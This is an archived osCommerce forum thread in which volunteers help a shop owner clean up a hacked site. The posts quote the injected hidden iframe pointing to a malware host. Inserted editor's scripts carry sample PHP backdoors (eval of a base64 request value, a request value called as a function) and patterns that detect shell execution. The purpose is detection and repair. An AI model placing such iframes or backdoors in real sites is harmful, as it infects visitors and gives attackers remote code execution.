ogwinilo, posted January 4, 2010

When opening my site, the web browser displays the following message:

"This website has been reported as unsafe. www.herbalsa.com. We recommend that you do not continue to this website. This website has been reported to Microsoft for containing threats to your computer that might reveal personal or financial information. This website has been reported to contain the following threats: Malicious software threat: This site contains links to viruses or other software programs that can reveal personal information stored or typed on your computer to malicious persons."

This is after installing an .htaccess patch and setting the permissions correctly, and now I can't open my products; it says products cannot be found, yet they are in the database. Only some of the new template installation changes are reflected on my site. What could be the solution to these?

Thanks in advance,
Felix
Ben Nevis, posted January 4, 2010

You may well have been hacked. It does not sound as though you took all the measures necessary to secure osC. I suggest you install the Site Monitor add-on and use it to check whether there are any suspicious files on your site. You can also browse the osC directories for files that should not be there (particularly look for PHP files in the images directory, for example) and open up some of the script (PHP) files to see whether there is a line at the top with the word 'eval' in it.

You can find details of all the measures needed to secure osC here. They all have to be done, and done on a site that has been cleaned of hacker files and code, and the database also needs to be checked for extra administrator accounts.

In case there is some innocent explanation for it, to do with the way you have set the .htaccess settings and any template you have installed, you still need to take all the necessary security measures and not just install an '.htaccess patch'.

--
www.jyoshna.com. Currently using osC with STS, Super Download Store, Categories Descriptions, Manufacturers Description, Individual Item Status, Infopages Unlimited, Product Sort, OSPlayer with flashmp3player, Product Tabs 2.1 with WebFX TabPane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!
Jan Zonjee, posted January 4, 2010

> When opening my site, the web browser displays the following message: "This website has been reported as unsafe

Indeed. At the bottom of your index page is a hidden iframe pointing at a site that is listed as an attack site hosting malware (spaces added around the dots in the URL):

    <iframe src="http:// jL . chura . pl / rc/ " style="display:none"></iframe>

See for example this page at Google. In your page:

    </table>
    <iframe src="http://as_above_without_spaces" style="display:none"></iframe>
    </body>
    </html>
ogwinilo, posted January 5, 2010

Thanks for your valuable feedback. I don't seem to locate:

    </table>
    <iframe src="http://as_above_without_spaces" style="display:none"></iframe>
    </body>
    </html>

Is it in the index.php file? When I find it, what do I do with it? (I know it feels like a stupid question.) Are the add-ons suggested by Ben Nevis in this post sufficient to pick it up and deal with it?

Thanks again
Ben Nevis, posted January 5, 2010

I suppose you could ask in the Site Monitor thread what sort of code changes it checks for when identifying suspicious files. This might not be the only hack on your site though, so this is not the only 'it' that needs to be dealt with.

The thread I referred you to has links to the various threads and posts for stopping various types of hacks on osC. There is a lot to do there, and none of it will work if you don't do the first step of either restoring your site and database from an unhacked backup (which can be difficult if you don't know what to look for in deciding whether the backup is 'clean' or not), or else identifying and removing all hacker code and files manually. Site Monitor can help with this, but again you need to know what sort of code to look for, which it appears you don't, so you're in a bit of a catch-22 situation.

All you can do is start: use Site Monitor either on your current site or from whatever backup you choose, look at and ask questions about any files it identifies, and try to get rid of the hacks. Then you will still have to do all the other things listed in the thread I referred you to. The 'dealing with it' has to be done by you adding the add-ons and code changes; the changes and add-ons all together should secure your site to the best of current knowledge of exploits and how to prevent them.
mdtaylorlrim, posted January 5, 2010

> I suppose you could ask in the Site Monitor thread what sort of code changes it checks for when identifying suspicious files.

It looks for files that have been changed: date-last-modified changes and file size changes. It does not look for code.

The problem with Site Monitor (and it is really not a problem, it's just the way it works) is that if you install Site Monitor on a site that has already been hacked it assumes that the hacked code is correct. You see, when you run Site Monitor for the first time you are telling it that what you now have is correct, and Site Monitor makes a database of the files then on your server at that time. It then checks your site, when it runs, against that database and reports any differences from then on. By installing Site Monitor on a hacked site you are not fixing anything, and Site Monitor will not report anything out of the ordinary until something changes again.

You should only install Site Monitor on a fresh install, and run it daily to quickly find out that you have been compromised. It will not prevent you from being hacked. That comes from other add-ons.

--
Community Bootstrap Edition, Edge. Avoid the most asked question. See How to Secure My Site and How do I...?
Ben Nevis, posted January 5, 2010

> It looks for files that have been changed: date-last-modified changes and file size changes. It does not look for code.

According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.
ogwinilo, posted January 5, 2010

> According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.

Truly humbled and appreciative of your input. I'm busy with those installs. I feel there is still a long way to go but will keep you posted.

However, and I don't know if this is associated with this, when I open the site on my mobile phone I get:

    MySQL Error!
    The error returned was: Table 'statistics' is marked as crashed and should be repaired
    Error Number 1194
    SELECT * FROM statistics WHERE ip='196.207.40.238'
Ben Nevis, posted January 5, 2010

> According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.

Specifically, apart from changed and added files, it looks for base64_decode and iframes. This can certainly be useful in identifying possibly hacked files even if it is run after hacking has taken place and the original date/timestamps and list of genuine files are unknown. It does however have to be said that backdoors can be opened with files that don't contain either of these, and such files, even if not genuine osC files, won't be discovered simply by using Site Monitor if it is run for the first time after hacking has already taken place.
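The checks discussed in this thread, as an added example that is not part of the thread, of Site Monitor or of osCommerce: a walk over a downloaded copy of the shop that flags hidden iframes, eval() and base64_decode() (the indicators the thread names) and PHP files under images/ (Ben Nevis's tip above). The EXTRA_PATTERNS that catch backdoors containing neither eval nor base64_decode are the editor's assumption about common PHP webshell idioms, and the sample file tree is constructed for the demonstration; the malware.invalid host in it is a placeholder.

```python
"""Heuristic scan of a downloaded osCommerce file tree for injected code.

Added example for this thread; it is not Site Monitor and not osCommerce code.
THREAD_PATTERNS are the indicators the thread names; EXTRA_PATTERNS are the
editor's assumption about other PHP backdoor idioms that use neither eval()
nor base64_decode(), which is the gap Ben Nevis points out above.
"""
import os
import re
import tempfile

THREAD_PATTERNS = {
    "hidden iframe": re.compile(
        r"<iframe\b[^>]*(display\s*:\s*none|(width|height)\s*=\s*[\"']?0\b)", re.I),
    "eval()": re.compile(r"\beval\s*\(", re.I),
    "base64_decode()": re.compile(r"\bbase64_decode\s*\(", re.I),
}

# Editor's additions (assumption, not from the thread).
EXTRA_PATTERNS = {
    "assert() on a string/variable": re.compile(r"\bassert\s*\(\s*[\"'$]", re.I),
    "preg_replace() with /e": re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*e['\"]\s*,", re.I),
    "create_function()": re.compile(r"\bcreate_function\s*\(", re.I),
    "request value called as a function": re.compile(
        r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(", re.I),
    "shell execution": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I),
}

PHP_EXTENSIONS = (".php", ".php3", ".php4", ".php5", ".phtml")


def scan_file(full_path, rel_path):
    """Return the list of reasons a single file is suspect (empty if none)."""
    reasons = []
    parts = rel_path.split("/")
    # osCommerce keeps only images under images/; a PHP file there is a classic dropped shell.
    if "images" in parts[:-1] and rel_path.lower().endswith(PHP_EXTENSIONS):
        reasons.append("PHP file under images/")
    try:
        with open(full_path, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return reasons
    for name, rx in list(THREAD_PATTERNS.items()) + list(EXTRA_PATTERNS.items()):
        if rx.search(text):
            reasons.append(name)
    return reasons


def scan_tree(root):
    """Walk root and map relative path -> reasons for every suspect file."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            reasons = scan_file(full, rel)
            if reasons:
                hits[rel] = reasons
    return hits


# Constructed sample tree (editor's assumption) mirroring the thread's findings:
# a hidden iframe appended to login.php, a shell dropped under images/, a
# backdoor without eval/base64_decode, and a library that legitimately uses eval.
SAMPLE_FILES = {
    "index.php": "<?php require('includes/application_top.php'); ?>\n<html><body>ok</body></html>\n",
    "login.php": (
        "<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>\n<br>\n"
        '<iframe src="http://malware.invalid/rc/" style="display:none"></iframe>\n'
        "</body>\n</html>\n"),
    "images/thumb.php": "<?php eval(base64_decode($_REQUEST['p'])); ?>\n",
    "includes/classes/cache_helper.php": "<?php $_POST['f']($_POST['a']); ?>\n",
    "includes/classes/nusoap.php": "<?php // stand-in for a library that uses eval\neval($evalStr);\n",
}


def build_sample_tree():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="osc-scan-")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, reasons in sorted(scan_tree(build_sample_tree()).items()):
        print(f"{rel}: {', '.join(reasons)}")
```

Every hit is a suspect, not a verdict: the stand-in nusoap.php is flagged for eval() exactly as the real library is later in this thread, while cache_helper.php is caught only by the extra pattern, which is the kind of backdoor a base64/iframe-only check misses. Run it against a downloaded copy, never through the live admin, and review each hit by hand.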
mdtaylorlrim, posted January 6, 2010

> According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.

You're right. It does, because I didn't read the history or dig deeper into it when I first looked at it. My mistake.
ogwinilo, posted January 6, 2010

On installing Site Monitor, I get the following results on checking for hacked files:

    Manually Check for Hacked Files
    Check all files for known hacker type code. Found files are suspect but not necessarily infected
    Checked 103 directories containing a total of 634 files. Skipped 386 files.
    9 suspected hacked files found.

    Hacked Files Found
    php.ini
    admin/administrators.php
    admin/login.php
    admin/sitemonitor_admin.php
    admin/sitemonitor_configure_setup.php
    admin/includes/classes/nusoap.php
    includes/sts_template.html
    includes/classes/nusoap.php
    includes/modules/payment/paypal_standard.php

Is there a tool to spot and remove the corrupted aspects/code in these? What should I do?

Thanks,
Felix
Ben Nevis, posted January 6, 2010

> On installing Site Monitor, I get the following results on checking for hacked files: [...] Is there a tool to spot and remove the corrupted aspects/code in these? What should I do?

Short answer: no. You have to open them up and look at them. They might or might not be safe; I would suspect at least some of them probably aren't. If you only just installed Site Monitor it seems a bit unlikely it would have been immediately hacked.

You will be looking for any inserted code calling the 'eval' function, or with <iframe> tags you didn't put there. If you find such code, post the section containing it here and someone should be able to tell you whether it's a hack or not. Most probably it will be.
Ben Nevis, posted January 6, 2010

And if your admin directory is called admin, you'd better change it quickly. See the links in the thread I referred you to in my post of 4th January, in particular the 'How to secure your site' thread.
Jan Zonjee, posted January 6, 2010

> You will be looking for any inserted code calling the 'eval' function, or with <iframe> tags you didn't put there.

The iframe is still there at this moment (spaces added around the dots in the URL) at the bottom of the HTML code (application_bottom.php? includes/footer.php? index.php?):

    <table width="780" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td><div align="center" class="style1"></div></td>
      </tr>
    </table>
    <iframe src="http:// jL . chura . pl /rc/" style="display:none"></iframe>
    </body>
    </html>

But at least the admin section is secured with an .htaccess.
ogwinilo, posted January 6, 2010

> Short answer: no. You have to open them up and look at them. [...] If you find such code, post the section containing it here and someone should be able to tell you whether it's a hack or not.

Appreciate your clarity. Will do. By the way, can I install IP Trap via cPanel's File Manager, or must it strictly be through FTP?

Regards,
Felix (South Africa)
ogwinilo, posted January 7, 2010

> Appreciate your clarity. Will do.

Of the nine possibly hacked files, I've managed to look at four. Please look at the following code to see if my suspicions of infection are founded. I found the following code suspected to be hacks:

1. At the bottom of login.php:

        </td>
        </tr>
        </table>
        <!-- body_eof //-->
        <!-- footer //-->
        <?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
        <!-- footer_eof //-->
        <br>
        <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
        </body>
        </html>
        <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

2. Also at the bottom of admin/sitemonitor_admin.php:

        <!-- END MANUALLY CHECK FOR HACKED FILES -->
        </table></td>
        <!-- body_text_eof //-->
        </tr>
        </table>
        <!-- body_eof //-->
        <!-- footer //-->
        <?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
        <!-- footer_eof //-->
        <br>
        <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
        </body>
        </html>
        <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

3. Also at the bottom of admin/sitemonitor_configure_setup.php:

        <!-- footer //-->
        <?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
        <!-- footer_eof //-->
        <br>
        <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
        </body>
        </html>
        <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

4. The admin/includes/classes/nusoap.php file is too big, but I managed to extract the following code:

        }
        // eval the class
        eval($evalStr);
        // instantiate proxy object
        eval("\$proxy = new nusoap_proxy_$r('');");
        // transfer current wsdl data to the proxy thereby avoiding parsing the wsdl twice
        $proxy->endpointType = 'wsdl';

        /**
         * dynamically creates proxy class code
         *
         * @return string PHP/NuSOAP code for the proxy class
         * @access private
         */
        function _getProxyClassCode($r) {
            $this->debug("in getProxy endpointType=$this->endpointType");
            $this->appendDebug("wsdl=" . $this->varDump($this->wsdl));
            if ($this->endpointType != 'wsdl') {
                $evalStr = 'A proxy can only be created for a WSDL client';
                $this->setError($evalStr);
                $evalStr = "echo \"$evalStr\";";
                return $evalStr;
            }
            if ($this->endpointType == 'wsdl' && is_null($this->wsdl)) {
                $this->loadWSDL();
                if ($this->getError()) {
                    return "echo \"" . $this->getError() . "\";";
                }
            }
            $evalStr = '';
            foreach ($this->operations as $operation => $opData) {
                if ($operation != '') {
                    // create param string and param comment string
                    if (sizeof($opData['input']['parts']) > 0) {
                        $paramStr = '';
                        $paramArrayStr = '';
                        $paramCommentStr = '';
                        foreach ($opData['input']['parts'] as $name => $type) {
                            $paramStr .= "\$$name, ";
                            $paramArrayStr .= "'$name' => \$$name, ";
                            $paramCommentStr .= "$type \$$name, ";
                        }
                        $paramStr = substr($paramStr, 0, strlen($paramStr)-2);
                        $paramArrayStr = substr($paramArrayStr, 0, strlen($paramArrayStr)-2);
                        $paramCommentStr = substr($paramCommentStr, 0, strlen($paramCommentStr)-2);
                    } else {
                        $paramStr = '';
                        $paramArrayStr = '';
                        $paramCommentStr = 'void';
                    }
                    $opData['namespace'] = !isset($opData['namespace']) ? 'http://testuri.com' : $opData['namespace'];
                    $evalStr .= "// $paramCommentStr
        function " . str_replace('.', '__', $operation) . "($paramStr) {
            \$params = array($paramArrayStr);
            return \$this->call('$operation', \$params, '".$opData['namespace']."', '".(isset($opData['soapAction']) ? $opData['soapAction'] : '')."');
        }
        ";
                    unset($paramStr);
                    unset($paramCommentStr);
                }
            }
            $evalStr = 'class nusoap_proxy_'.$r.' extends nusoap_client {
        '.$evalStr.'
        }';
            return $evalStr;
        }

Please suggest the appropriate course of action in these cases.

Thanks a great deal,
Felix
mdtaylorlrim, posted January 7, 2010

1, 2 and 3: osC does not use iframes.

4: I don't recall a file called nusoap.php in the stock release of osC.
ogwinilo, posted January 8, 2010

> 1, 2 and 3: osC does not use iframes. 4: I don't recall a file called nusoap.php in the stock release of osC.

Thanks for the response. Just to confirm, would you suggest I remove them?
mdtaylorlrim, posted January 8, 2010

> Thanks for the response. Just to confirm, would you suggest I remove them?

What I would do is ask myself:

"How many add-ons have I added to this install?"
"How long will it take me to reinstall them if I wipe my site and install fresh?"
"Do I have backup files known to be good prior to being hacked the first time? (Do I even know the first time I was hacked?)"
"Do I have the skills to risk doing a manual clean of the files and go back live?"

First choice is going to be to wipe the site and start over, not putting it live on the internet until all security mods have been installed. Second is going to be to wipe the site and reinstall from a good backup. And only if I have no other choice would I manually clean the files.

If I had to do the latter I would completely remove the site from access. Download all files to my local hard drive. Do a search for iframes with whatever means I have available to me, and delete them all. Then take a list of filenames from a stock osC and note all files that are part of the stock osC. Note any files that are part of any add-on I installed. Any remaining files should be deleted. Wipe the site clean. This step is really important! Finally, upload the site files and start testing, all the while having access to the site restricted to you only.

Is that what you were hoping for?
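The manual triage described in the post above (compare the downloaded site against a stock file list, set aside the files belonging to add-ons you know you installed, treat everything else as a deletion candidate), as an added example that is not part of the thread or of osCommerce. It hashes both trees so that an edited stock file (the footer with the iframe appended) shows up as modified rather than passing on name alone. The two sample trees are constructed by the editor; in practice the stock tree is a pristine download of the same osCommerce release and the add-on list is the one you write down from your own install notes.

```python
"""Triage a downloaded site tree against a stock osCommerce file list.

Added example for this thread, not osCommerce or Site Monitor code. Every
file on the site ends up in one of four buckets: unchanged stock, modified
stock, declared add-on, or unknown (delete unless you can name the add-on it
belongs to). Stock files missing from the site are reported as well.
"""
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map relative path -> SHA-256 of contents for every file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def triage(site, stock, addon_files):
    """Classify site files; site and stock are path -> digest maps from hash_tree()."""
    addon_files = set(addon_files)
    result = {"unchanged": [], "modified": [], "addon": [], "unknown": [], "missing": []}
    for rel, digest in sorted(site.items()):
        if rel in stock:
            bucket = "unchanged" if stock[rel] == digest else "modified"
        elif rel in addon_files:
            bucket = "addon"
        else:
            bucket = "unknown"
        result[bucket].append(rel)
    result["missing"] = sorted(set(stock) - set(site))
    return result


# Constructed sample trees (editor's assumption). The site copy has an iframe
# appended to footer.php, two files that belong to neither stock nor a declared
# add-on, and one stock file that has gone missing.
STOCK_SAMPLE = {
    "index.php": "<?php require('includes/application_top.php'); ?>\n",
    "checkout_process.php": "<?php /* stock checkout */ ?>\n",
    "admin/login.php": "<?php /* stock admin login */ ?>\n",
    "includes/footer.php": "<div>footer</div>\n",
}
SITE_SAMPLE = {
    "index.php": STOCK_SAMPLE["index.php"],
    "admin/login.php": STOCK_SAMPLE["admin/login.php"],
    "includes/footer.php": STOCK_SAMPLE["includes/footer.php"]
        + '<iframe src="http://malware.invalid/rc/" style="display:none"></iframe>\n',
    "includes/sts_template.html": "<html>STS template</html>\n",
    "includes/classes/nusoap.php": "<?php /* not in stock osC */ ?>\n",
    "images/thumb.php": "<?php eval($_POST['x']); ?>\n",
}
DECLARED_ADDONS = ["includes/sts_template.html"]


def write_tree(files):
    """Materialise a path -> contents map in a fresh temporary directory."""
    root = tempfile.mkdtemp(prefix="osc-triage-")
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def triage_samples():
    """Run the triage over the two constructed trees and return the buckets."""
    site = hash_tree(write_tree(SITE_SAMPLE))
    stock = hash_tree(write_tree(STOCK_SAMPLE))
    return triage(site, stock, DECLARED_ADDONS)


if __name__ == "__main__":
    for bucket, paths in triage_samples().items():
        print(f"{bucket}: {paths}")
```

Files in the "modified" bucket that you edited yourself (configure.php, a template) need a diff against stock rather than a blind replace, because the injected iframe sits next to your legitimate changes; the "unknown" bucket is where a file like nusoap.php lands until someone can tie it to an add-on, which is the question this thread ends up asking.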
ogwinilo, posted January 8, 2010

> What I would do is ask myself: [...] Is that what you were hoping for?

Great stuff, thanks a lot.
ogwinilo, posted January 8, 2010

I am trying to delete all the iframe code manually using Notepad. I save the changes, but the next time I open the document it's not deleted. Is there a special way I can delete these?
Ben Nevis, posted January 8, 2010

1, 2 and 3 are definite hacks; it's the same code that Jan Zonjee already pointed out.

nusoap.php isn't a standard osC 2.2 file that I'm aware of, but it does not appear to be hacker code. In another thread someone said it's a CRE secure payment module. CRE is an osC fork; is that what you are using, by any chance? Anyway, if you don't use that module you can remove it.

As Mark said, the best thing is to start again from a believed-clean backup, and install Site Monitor again to check the backup.
mdtaylorlrim, posted January 8, 2010

> I am trying to delete all the iframe code manually using Notepad. I save the changes, but the next time I open the document it's not deleted. Is there a special way I can delete these?

So, you are working with a local copy of the file. You know its location on your hard disk. You open it. Change it. And save it. Any errors yet? No? OK, open it. Did it revert back to the original code? Yes? Do a virus scan on your local machine.

Is your shop on your local machine by chance? Were you running your shop on the internet from your local machine? Windows? If the answer to this is yes, then you seriously need to consider doing a factory restore on your local machine. The hacker most likely put code deep in your machine where you will never find it, and thus you will never fix this problem.
ogwinilo, posted January 9, 2010

> So, you are working with a local copy of the file. [...] The hacker most likely put code deep in your machine where you will never find it, and thus you will never fix this problem.

Wow! This is hectic. Thanks for the tips. Will do. Who would do such things? This is amazing.
This topic is now archived and is closed to further replies.